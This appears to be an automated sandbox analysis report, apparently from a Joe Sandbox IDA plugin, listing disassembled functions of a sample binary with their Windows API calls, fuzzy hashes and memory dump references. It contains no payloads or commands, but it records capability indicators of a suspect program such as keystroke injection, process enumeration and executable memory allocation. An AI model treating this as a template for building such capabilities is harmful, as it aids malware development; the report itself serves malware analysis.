                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: 2d3c0514707716bed3ff4a78473701cd6e8af785c68ff3ca4b892f2c4905183b
                                                          • Instruction ID: 95ef5647004724943d1b52338dacb1bd0abde396074e11856f5d14657d17ce2c
                                                          • Opcode Fuzzy Hash: 2d3c0514707716bed3ff4a78473701cd6e8af785c68ff3ca4b892f2c4905183b
                                                          • Instruction Fuzzy Hash: BDD0177584425AFACB119A92E8D89F9737CAB0A709F182462BD06E2040E2219BD4EA25
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3cdaaf56074c1d4b5b8b6a51238490890a674ab94cc20ce91fbc74e52d2ce64d
                                                          • Instruction ID: 1aa7d6baba6c22084c8b9e889aa395f09ff1da04cc89da0aaf96cd4d424b6fed
                                                          • Opcode Fuzzy Hash: 3cdaaf56074c1d4b5b8b6a51238490890a674ab94cc20ce91fbc74e52d2ce64d
                                                          • Instruction Fuzzy Hash: F3C12C75A04216EFCB14CFA4C884AAEBBB5FF88714F158698EC15EB251D730DE81DB90
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 00CDE0BE
                                                          • CharLowerBuffW.USER32(?,?), ref: 00CDE101
                                                            • Part of subcall function 00CDD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CDD7C5
                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CDE301
                                                          • _memmove.LIBCMT ref: 00CDE314
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                          • String ID:
                                                          • API String ID: 3659485706-0
                                                          • Opcode ID: 8c222fe84a7c5c014386190aa75d994ef18035f8ccbcb76ec4362058e9b15365
                                                          • Instruction ID: d2f5ce1229bdd317f279c12655956266248dff9aba4465df9d1ffb9c1da915b0
                                                          • Opcode Fuzzy Hash: 8c222fe84a7c5c014386190aa75d994ef18035f8ccbcb76ec4362058e9b15365
                                                          • Instruction Fuzzy Hash: 86C12971604301DFC754EF28C480A6ABBE4FF89718F14896EF9999B351D731EA46CB82
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 00CD80C3
                                                          • CoUninitialize.OLE32 ref: 00CD80CE
                                                            • Part of subcall function 00CBD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CBD5D4
                                                          • VariantInit.OLEAUT32(?), ref: 00CD80D9
                                                          • VariantClear.OLEAUT32(?), ref: 00CD83AA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
                                                          • Opcode ID: f30fd27b323d3018d17f5a5c0ee34b94fc18fa7cba8c8a56bcdd71f8bd8a1b7d
                                                          • Instruction ID: 7a1a3ff92ffd19a29314548157627d0977ccf58b68f85c9468a148d50207e857
                                                          • Opcode Fuzzy Hash: f30fd27b323d3018d17f5a5c0ee34b94fc18fa7cba8c8a56bcdd71f8bd8a1b7d
                                                          • Instruction Fuzzy Hash: 7AA146756047019FCB10DF65C881B2AB7E8FF89754F148459FA9A9B3A1CB30ED09DB82
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CF2C7C,?), ref: 00CB76EA
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CF2C7C,?), ref: 00CB7702
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00CEFB80,000000FF,?,00000000,00000800,00000000,?,00CF2C7C,?), ref: 00CB7727
                                                          • _memcmp.LIBCMT ref: 00CB7748
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID:
                                                          • API String ID: 314563124-0
                                                          • Opcode ID: 6ab3850ca12f41db54c3a3e8ed7bc8df43d32d3dbb3b354c79949b72d6b410be
                                                          • Instruction ID: aa6964bdef39185c602c4e8d7f980c4c8cd385382700ca91b6d5de443ba21695
                                                          • Opcode Fuzzy Hash: 6ab3850ca12f41db54c3a3e8ed7bc8df43d32d3dbb3b354c79949b72d6b410be
                                                          • Instruction Fuzzy Hash: A4811C75A00109EFCB04DFA4C984EEEB7B9FF89315F204558F916AB250DB71AE46CB60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: d840a02099a784eaf6a165d0f365b5bd8b61fa8d3c8de4ec7a4ce3a65eb8a666
                                                          • Instruction ID: 9384dfe67dc8cd5b66c807d64991923c88b9322481ebf7f65431a645f9cf98e5
                                                          • Opcode Fuzzy Hash: d840a02099a784eaf6a165d0f365b5bd8b61fa8d3c8de4ec7a4ce3a65eb8a666
                                                          • Instruction Fuzzy Hash: 4D5191747003019ADF24AF66D891BBEB3E9EF45310F20D81FE596DB291DB78D884AB05
                                                          APIs
                                                          • GetWindowRect.USER32(00F9E7F0,?), ref: 00CE9863
                                                          • ScreenToClient.USER32(00000002,00000002), ref: 00CE9896
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00CE9903
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: 07adb82c337806d4722919f42137fd68c3588242429911b381601743b87d48db
                                                          • Instruction ID: 441bdda327b6579d5603b1d08cc26efe2b42ea243bf9a7889c37afcf7595a974
                                                          • Opcode Fuzzy Hash: 07adb82c337806d4722919f42137fd68c3588242429911b381601743b87d48db
                                                          • Instruction Fuzzy Hash: D5514D34A00249EFCF20CF65D881AAE7BB5FF55360F14816DF8699B2A1D770AE41CB90
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00CB9AD2
                                                          • __itow.LIBCMT ref: 00CB9B03
                                                            • Part of subcall function 00CB9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00CB9DBE
                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00CB9B6C
                                                          • __itow.LIBCMT ref: 00CB9BC3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: d74203e94ef22e6a49da076cb81b0b2fd6ed4defc4764c2bdee654ef7d87d2a1
                                                          • Instruction ID: bf82ff94c0bc94997c3bbe2bcd15b3739e730e623d99af7d0242e1398a0c0070
                                                          • Opcode Fuzzy Hash: d74203e94ef22e6a49da076cb81b0b2fd6ed4defc4764c2bdee654ef7d87d2a1
                                                          • Instruction Fuzzy Hash: 8941A174A00208ABDF21EF64D885BFE7BB9EF44754F000469FA15A7291DB709E44DBA1
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00CD69D1
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CD69E1
                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CD6A45
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CD6A51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                          • String ID:
                                                          • API String ID: 2214342067-0
                                                          • Opcode ID: b89175412b6d2c2a842c78c9073a2d0fb7099befc9e2b8e980de545ae7bab8f8
                                                          • Instruction ID: b0e12aecc79db3a542124ac8bfee4a1237aa7f3434a373eb2b76998bf6db1ab4
                                                          • Opcode Fuzzy Hash: b89175412b6d2c2a842c78c9073a2d0fb7099befc9e2b8e980de545ae7bab8f8
                                                          • Instruction Fuzzy Hash: E8419D75640200AFEB60AF64CCC6F2A77E8DF18B14F048119FA59AF3C2DB709D01AB91
                                                          APIs
                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00CEF910), ref: 00CD64A7
                                                          • _strlen.LIBCMT ref: 00CD64D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: 86b434f7deba66d1d0fd1189366af92f869645efb5c96a6134f4bd25f018a6a7
                                                          • Instruction ID: fae92224630011d1135c942c576f9fa9f48dc5a15c14d853366e8b567679af93
                                                          • Opcode Fuzzy Hash: 86b434f7deba66d1d0fd1189366af92f869645efb5c96a6134f4bd25f018a6a7
                                                          • Instruction Fuzzy Hash: 2041B771500104AFCB24EFA4ECD5FAEB7A9EF54310F14815AFA1997392EB30AE45DB50
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CCB89E
                                                          • GetLastError.KERNEL32(?,00000000), ref: 00CCB8C4
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CCB8E9
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CCB915
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 664784eb8ff79be50936ff27c648f46c72ebd4d0db90ff687392d0a0c6410f78
                                                          • Instruction ID: 3516410f23d72b7b8d603545d3dc483a5b27b3ecfde350154cae891a69af0fb0
                                                          • Opcode Fuzzy Hash: 664784eb8ff79be50936ff27c648f46c72ebd4d0db90ff687392d0a0c6410f78
                                                          • Instruction Fuzzy Hash: 79410939600650DFCB21EF55C485A5DBBE5EF8A310F198098ED5AAB3A2CB30FD01DB91
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CE88DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 68607668a28d55c5b58d94ad376503ab10de1ea1baedb7b6c33b850878b78fee
                                                          • Instruction ID: a0d255fadc24487b7afe9496260e1eb5cfcae839430d575ce6c162e23e42a452
                                                          • Opcode Fuzzy Hash: 68607668a28d55c5b58d94ad376503ab10de1ea1baedb7b6c33b850878b78fee
                                                          • Instruction Fuzzy Hash: E831E834A40288AFEF309B56DC85FBD77A5EB05310F944111FA29E62E2CE71DA489752
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 00CEAB60
                                                          • GetWindowRect.USER32(?,?), ref: 00CEABD6
                                                          • PtInRect.USER32(?,?,00CEC014), ref: 00CEABE6
                                                          • MessageBeep.USER32(00000000), ref: 00CEAC57
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: d9e3e44aaa2c713b53f29ada55c845cbdd8ffe937324ac90849de1c1ca6e84ad
                                                          • Instruction ID: 48d7843379b642de69413cd987827d7ecd59c8bafbe702470ed406c780d7783a
                                                          • Opcode Fuzzy Hash: d9e3e44aaa2c713b53f29ada55c845cbdd8ffe937324ac90849de1c1ca6e84ad
                                                          • Instruction Fuzzy Hash: AF418030600699DFCB21DF5AD884B69BBF5FB49300F2480A9E415DF364D731B942CBA2
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CC0B27
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CC0B43
                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00CC0BA9
                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00CC0BFB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 527a02f7be54c2a48d6192bce0821a76f8d94d449634a865f2eb02666accb68e
                                                          • Instruction ID: b99a18fd30b4deabb7901957dade04a5177ac899d90a78f81d8429c0ad0fddd6
                                                          • Opcode Fuzzy Hash: 527a02f7be54c2a48d6192bce0821a76f8d94d449634a865f2eb02666accb68e
                                                          • Instruction Fuzzy Hash: C5313730D40608EFFB30CB65CC15FFEBBA9AB45328F28425EE5A5521D1C3748E819761
                                                          APIs
                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00CC0C66
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CC0C82
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00CC0CE1
                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00CC0D33
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 95ba411ab88ca888eb7b3aac93b7ab9d1f4bd8aa6512592af613c8fd7f4d5554
                                                          • Instruction ID: f0b5df1e95e8af20a1be916395b24b06b322060febe66bbf1d0b507d3a0d0b91
                                                          • Opcode Fuzzy Hash: 95ba411ab88ca888eb7b3aac93b7ab9d1f4bd8aa6512592af613c8fd7f4d5554
                                                          • Instruction Fuzzy Hash: 6F312630940758EEFF308B65CC05FFEBBAAAB45310F24435EE4A5521D1C3399A46D762
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C961FB
                                                          • __isleadbyte_l.LIBCMT ref: 00C96229
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C96257
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C9628D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 325766faff15a9c16b79ee2920b2cc429c32bd8de64d8a1c9fbecff6b4e4d464
                                                          • Instruction ID: cf83758be3a42d41279647b527d472c6536103e384f78d040a2e4fb2cdfd2a7c
                                                          • Opcode Fuzzy Hash: 325766faff15a9c16b79ee2920b2cc429c32bd8de64d8a1c9fbecff6b4e4d464
                                                          • Instruction Fuzzy Hash: 1431B03160468AAFDF229F75CC48BBE7BA9FF42310F154029E864971E1D731EA51DB90
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 00CE4F02
                                                            • Part of subcall function 00CC3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CC365B
                                                            • Part of subcall function 00CC3641: GetCurrentThreadId.KERNEL32 ref: 00CC3662
                                                            • Part of subcall function 00CC3641: AttachThreadInput.USER32(00000000,?,00CC5005), ref: 00CC3669
                                                          • GetCaretPos.USER32(?), ref: 00CE4F13
                                                          • ClientToScreen.USER32(00000000,?), ref: 00CE4F4E
                                                          • GetForegroundWindow.USER32 ref: 00CE4F54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: d8c42b58df4e2f7f9b8d4c574f4abc512f55ad1b772f1b3584e702e0388f240c
                                                          • Instruction ID: b7ab5b4ea13c362a3241c0c69a296e3e78f95cdf54e52f86e0595107d79a1a12
                                                          • Opcode Fuzzy Hash: d8c42b58df4e2f7f9b8d4c574f4abc512f55ad1b772f1b3584e702e0388f240c
                                                          • Instruction Fuzzy Hash: 7A311CB1D00148AFDB10EFA6C885EEFB7FDEF98300F10406AE415E7241DA759E459BA1
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00CC3C7A
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00CC3C88
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00CC3CA8
                                                          • CloseHandle.KERNEL32(00000000), ref: 00CC3D52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
